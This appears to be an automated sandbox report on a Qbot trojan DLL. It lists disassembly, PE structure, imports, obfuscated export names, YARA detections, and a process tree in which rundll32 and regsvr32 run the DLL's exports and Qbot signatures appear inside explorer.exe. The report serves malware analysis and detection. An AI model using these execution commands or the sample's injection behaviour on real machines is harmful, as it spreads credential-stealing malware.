          jmp 00007F803866B9CAh
          call 00007F803866C0B1h
          push eax
          call 00007F803866DF63h
          pop ecx
          test eax, eax
          je 00007F803866B9B5h
          xor al, al
          ret
          call 00007F803866E393h
          mov al, 01h
          ret
          Programming Language:
          • [C++] VS2015 UPD3.1 build 24215
          • [EXP] VS2015 UPD3.1 build 24215
          • [RES] VS2015 UPD3 build 24213
          • [LNK] VS2015 UPD3.1 build 24215
          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e9d0 | 0xb4 | .rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ea84 | 0x28 | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1e0 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x61000 | 0x1800 | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3dc00 | 0x1c | .rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3dc20 | 0x40 | .rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x13c | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0x19758 | 0x19800 | False | 0.6238893995098039 | data | 6.670510713034416 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata | 0x1b000 | 0x24196 | 0x24200 | False | 0.5961897166955017 | data | 5.294383525365631 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data | 0x40000 | 0x1e014 | 0x1d600 | False | 0.5799368351063829 | data | 4.485632219577427 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .gfids | 0x5f000 | 0xa4 | 0x200 | False | 0.27734375 | data | 1.453370752371076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc | 0x60000 | 0x1e0 | 0x200 | False | 0.52734375 | data | 4.708553337303423 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x61000 | 0x1800 | 0x1800 | False | 0.8302408854166666 | data | 6.704808054706065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          Name | RVA | Size | Type | Language | Country
          RT_MANIFEST | 0x60060 | 0x17d | XML 1.0 document text | English | United States
          DLL | Import
          KERNEL32.dll | CreateFileA, SetEndOfFile, SetFilePointer, CloseHandle, GetLastError, HeapAlloc, HeapFree, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, ExitProcess, CreateThread, OpenThread, ResumeThread, VirtualAlloc, GetProcAddress, LoadLibraryA, CreateActCtxA, ActivateActCtx, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, CompareStringW, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, DecodePointer, RaiseException, CreateFileW, WriteFile, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW
          Name | Ordinal | Address
          DllRegisterServer | 1 | 0x10014181
          GDyZ | 2 | 0x1001613d
          GHQvB58h2E | 3 | 0x1000164f
          LGv5I | 4 | 0x1001a556
          Mqae01id | 5 | 0x1001450e
          SNifCw242OCD | 6 | 0x10015588
          Language of compilation system | Country where language is spoken
          English | United States
          No network behavior found


          Target ID:0
          Start time:18:10:45
          Start date:12/09/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll"
          Imagebase:0x2e0000
          File size:116736 bytes
          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:1
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Imagebase:0xb0000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:2
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll
          Imagebase:0x150000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:3
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:4
          Start time:18:10:46
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:5
          Start time:18:10:51
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:7
          Start time:18:10:56
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E
          Imagebase:0x820000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:9
          Start time:18:11:04
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Imagebase:0xd30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:12
          Start time:18:11:25
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Imagebase:0xd30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:18
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:19
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:20
          Start time:18:11:49
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:22
          Start time:18:11:54
          Start date:12/09/2022
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x20000
          File size:3611360 bytes
          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:31
          Start time:18:12:49
          Start date:12/09/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff745070000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language

            Execution Graph

            Execution Coverage:3.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:6.9%
            Total number of Nodes:1007
            Total number of Limit Nodes:28
8732 6d510442 ___scrt_fastfail 8726->8732 8727 6d508b95 _ValidateLocalCookies 5 API calls 8729 6d50d65a 8727->8729 8728->8732 8736 6d51071d 8729->8736 8730 6d5104b3 8741 6d5104e0 8730->8741 8732->8730 8734 6d510487 MultiByteToWideChar 8732->8734 8733->8727 8734->8730 8735 6d5104a3 GetStringTypeW 8734->8735 8735->8730 8737 6d50b580 __fassign 38 API calls 8736->8737 8738 6d510730 8737->8738 8745 6d510500 8738->8745 8742 6d5104ec 8741->8742 8744 6d5104fd 8741->8744 8743 6d50b3fe __freea 20 API calls 8742->8743 8742->8744 8743->8744 8744->8733 8747 6d51051b 8745->8747 8746 6d510541 MultiByteToWideChar 8748 6d5106f5 8746->8748 8749 6d51056b 8746->8749 8747->8746 8750 6d508b95 _ValidateLocalCookies 5 API calls 8748->8750 8752 6d50b438 __onexit 21 API calls 8749->8752 8755 6d51058c 8749->8755 8751 6d50d67b 8750->8751 8751->8721 8752->8755 8753 6d5105d5 MultiByteToWideChar 8754 6d5105ee 8753->8754 8767 6d510641 8753->8767 8772 6d50cd05 8754->8772 8755->8753 8755->8767 8757 6d5104e0 __freea 20 API calls 8757->8748 8759 6d510618 8762 6d50cd05 11 API calls 8759->8762 8759->8767 8760 6d510650 8761 6d50b438 __onexit 21 API calls 8760->8761 8768 6d510671 8760->8768 8761->8768 8762->8767 8763 6d5106e6 8765 6d5104e0 __freea 20 API calls 8763->8765 8764 6d50cd05 11 API calls 8766 6d5106c5 8764->8766 8765->8767 8766->8763 8769 6d5106d4 WideCharToMultiByte 8766->8769 8767->8757 8768->8763 8768->8764 8769->8763 8770 6d510714 8769->8770 8771 6d5104e0 __freea 20 API calls 8770->8771 8771->8767 8773 6d50c9bd _abort 5 API calls 8772->8773 8774 6d50cd2c 8773->8774 8777 6d50cd35 8774->8777 8780 6d50cd8d 8774->8780 8778 6d508b95 _ValidateLocalCookies 5 API calls 8777->8778 8779 6d50cd87 8778->8779 8779->8759 8779->8760 8779->8767 8781 6d50c9bd _abort 5 API calls 8780->8781 8782 6d50cdb4 8781->8782 8783 6d508b95 _ValidateLocalCookies 5 API calls 8782->8783 8784 6d50cd75 LCMapStringW 8783->8784 8784->8777 8786 6d50d386 ___scrt_is_nonwritable_in_current_image 8785->8786 8793 6d50c2f6 
EnterCriticalSection 8786->8793 8788 6d50d390 8794 6d50d3e5 8788->8794 8792 6d50d3a9 ___scrt_is_nonwritable_in_current_image 8792->8518 8793->8788 8806 6d50db05 8794->8806 8796 6d50d433 8797 6d50db05 26 API calls 8796->8797 8798 6d50d44f 8797->8798 8799 6d50db05 26 API calls 8798->8799 8800 6d50d46d 8799->8800 8801 6d50b3fe __freea 20 API calls 8800->8801 8802 6d50d39d 8800->8802 8801->8802 8803 6d50d3b1 8802->8803 8820 6d50c33e LeaveCriticalSection 8803->8820 8805 6d50d3bb 8805->8792 8807 6d50db16 8806->8807 8811 6d50db12 8806->8811 8808 6d50db1d 8807->8808 8813 6d50db30 ___scrt_fastfail 8807->8813 8809 6d50bf62 __dosmaperr 20 API calls 8808->8809 8810 6d50db22 8809->8810 8812 6d50bea6 _abort 26 API calls 8810->8812 8811->8796 8812->8811 8813->8811 8814 6d50db67 8813->8814 8815 6d50db5e 8813->8815 8814->8811 8817 6d50bf62 __dosmaperr 20 API calls 8814->8817 8816 6d50bf62 __dosmaperr 20 API calls 8815->8816 8818 6d50db63 8816->8818 8817->8818 8819 6d50bea6 _abort 26 API calls 8818->8819 8819->8811 8820->8805 8822 6d50b493 8821->8822 8823 6d50b4a1 8821->8823 8822->8823 8827 6d50b4b8 8822->8827 8824 6d50bf62 __dosmaperr 20 API calls 8823->8824 8829 6d50b4a9 8824->8829 8825 6d50bea6 _abort 26 API calls 8826 6d50b4b3 8825->8826 8826->8445 8827->8826 8828 6d50bf62 __dosmaperr 20 API calls 8827->8828 8828->8829 8829->8825 8834 6d50acfc 8830->8834 8835 6d50abcc 8830->8835 8831 6d50ad13 8833 6d50b3fe __freea 20 API calls 8831->8833 8832 6d50b3fe __freea 20 API calls 8832->8834 8833->8835 8834->8831 8834->8832 8835->8444 8837 6d50bec1 8836->8837 8838 6d50bcdc _abort 8 API calls 8837->8838 8839 6d50bed6 GetCurrentProcess TerminateProcess 8838->8839 8839->8449 7932 6d514181 7935 6d518f63 7932->7935 7949 6d506fc7 7935->7949 7937 6d519046 7959 6d50768e SNifCw242OCD Mqae01id 7937->7959 7943 6d519272 7944 6d5192a2 7943->7944 7947 6d51937f 7943->7947 7948 6d51418b 7943->7948 7982 6d5173b5 7944->7982 7946 6d5193aa SNifCw242OCD 7946->7947 7947->7946 7947->7948 7950 6d50704b 
7949->7950 7954 6d507227 7949->7954 8006 6d506ce5 7950->8006 7954->7937 7957 6d5071d3 8034 6d504dfd 7957->8034 8101 6d513e64 7959->8101 7962 6d50794b 7969 6d502ae5 7962->7969 7963 6d507881 8110 6d5029e2 7963->8110 7964 6d5143a4 SetEndOfFile 7968 6d507953 7964->7968 7966 6d51a07d 2 API calls 7967 6d507b43 LeaveCriticalSection 7966->7967 7967->7968 7968->7962 7968->7964 7968->7966 7970 6d502c25 7969->7970 7971 6d502b48 7969->7971 7974 6d502c78 7970->7974 7978 6d502c13 7970->7978 8124 6d518a58 7971->8124 7973 6d502b94 8134 6d5045c9 7973->8134 8140 6d506bba 7974->8140 7977 6d502e8e 7986 6d50391b 7977->7986 7978->7977 7979 6d502d1d 7978->7979 7979->7978 7980 6d506bba LoadLibraryA 7979->7980 7981 6d502e8b 7980->7981 7981->7977 7983 6d51742c 7982->7983 7984 6d517449 7982->7984 7983->7984 7985 6d518891 11 API calls 7983->7985 7984->7948 7985->7984 7987 6d503993 7986->7987 7991 6d503b6e 7986->7991 7988 6d5039a1 GetProcAddress 7987->7988 7989 6d503a35 7987->7989 7988->7991 8155 6d515150 7989->8155 7992 6d503c27 GetProcAddress 7991->7992 8002 6d503f18 7991->8002 7993 6d503c7b VirtualAlloc 7992->7993 8005 6d503d79 7992->8005 8000 6d503ca3 7993->8000 7993->8005 7994 6d5041c2 7996 6d50226b 11 API calls 7994->7996 7995 6d504152 7998 6d506b43 2 API calls 7995->7998 7999 6d504186 7996->7999 7997 6d503ed5 GetPEB 7997->8002 7998->7999 7999->7943 8001 6d503ced ExitProcess 8000->8001 8004 6d503d46 VirtualAlloc 8000->8004 8002->7994 8002->7995 8004->8005 8005->7997 8005->8005 8007 6d506fb9 8006->8007 8008 6d506d79 8006->8008 8016 6d51a27e 8007->8016 8015 6d506ded 8008->8015 8042 6d5151f2 8008->8042 8010 6d506e70 8049 6d501000 8010->8049 8011 6d506f57 8013 6d506f7a EnterCriticalSection LeaveCriticalSection 8011->8013 8013->8007 8015->8010 8015->8011 8017 6d51a350 8016->8017 8018 6d51a2f4 8016->8018 8019 6d50226b 9 API calls 8017->8019 8018->8017 8021 6d51a35a 8018->8021 8022 6d51a30e 8018->8022 8020 6d51a498 8019->8020 8089 6d514f75 8020->8089 8024 6d51a3d9 8021->8024 8025 6d51a36b 
8021->8025 8083 6d504843 8022->8083 8024->8017 8027 6d51a3ff OpenThread 8024->8027 8025->8017 8026 6d51a376 EnterCriticalSection 8025->8026 8026->8017 8027->8017 8029 6d507137 8030 6d51a07d 8029->8030 8031 6d51a0d9 8030->8031 8032 6d51a0e7 8030->8032 8031->8032 8033 6d51a1ff ActivateActCtx ResumeThread 8031->8033 8032->7957 8033->8032 8035 6d504e68 8034->8035 8037 6d504f98 8034->8037 8036 6d515750 2 API calls 8035->8036 8040 6d504e9c 8036->8040 8039 6d5151f2 11 API calls 8037->8039 8041 6d504f3c 8037->8041 8038 6d5143a4 SetEndOfFile 8038->8041 8039->8037 8040->8038 8041->7954 8043 6d515270 8042->8043 8048 6d5152e7 8042->8048 8044 6d51541a 8043->8044 8045 6d515282 8043->8045 8047 6d515443 GetLastError 8044->8047 8044->8048 8045->8048 8058 6d504294 8045->8058 8047->8044 8048->8015 8050 6d501096 8049->8050 8053 6d5011a8 8049->8053 8062 6d5185cb 8050->8062 8052 6d5012d0 8073 6d5143a4 8052->8073 8053->8052 8065 6d50226b 8053->8065 8056 6d501151 GHQvB58h2E 8056->8007 8057 6d501289 CreateThread 8057->8052 8057->8053 8059 6d50432c 8058->8059 8061 6d50441d 8058->8061 8059->8048 8060 6d51a27e 11 API calls 8060->8061 8061->8059 8061->8060 8063 6d51881a CreateActCtxA 8062->8063 8064 6d5185f3 8062->8064 8063->8064 8064->8056 8066 6d5022ee 8065->8066 8069 6d5022f8 8065->8069 8067 6d50238b CreateFileA SetFilePointer 8066->8067 8066->8069 8068 6d5151f2 8 API calls 8067->8068 8070 6d50248f 8068->8070 8069->8057 8077 6d518891 8070->8077 8074 6d5143cb 8073->8074 8075 6d5143e0 8073->8075 8074->8075 8076 6d5144d5 SetEndOfFile 8074->8076 8075->8056 8076->8074 8078 6d51890f 8077->8078 8082 6d5024ee SetEndOfFile 8077->8082 8079 6d504294 11 API calls 8078->8079 8078->8082 8080 6d5189e2 8079->8080 8081 6d518891 11 API calls 8080->8081 8081->8082 8082->8069 8084 6d504980 8083->8084 8085 6d5048ae 8083->8085 8086 6d504988 